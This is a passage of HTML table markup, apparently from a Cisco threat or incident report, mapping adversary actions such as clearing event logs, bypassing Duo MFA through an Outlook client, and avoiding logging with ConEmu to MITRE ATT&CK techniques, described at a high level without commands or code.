CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used the terminal emulator &quot;</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">ConEmu</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">&quot; to run commands, intentionally avoiding log generation.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2101199054" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{234}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">2</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="22" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1343515945" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{17}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1992522483" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{242}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1070.001: Indicator Removal: Clear Windows Event Logs</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="50643362" paraeid="{a86f9c39-020b-46a6-a896-d486e6ba6419}{249}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he adversary<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">deleted</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>logs on compromised devices to limit forensic findings.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1709747414" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{3}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="23" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="2105554875" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{21}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="98968609" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{11}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1556:<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Modify</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Authentication Process</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="470406930" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{18}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary set up an Outlook<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">client</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>Outlook client to connect to the Exchange Server and was able to send messages via that path which bypasses the requirement for MFA via Duo.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="246610620" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{25}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="24" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1778688608" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{25}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1191893297" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{33}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1562.001: Impair Defenses: Disable or Modify Tools</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1756724517" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{40}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" 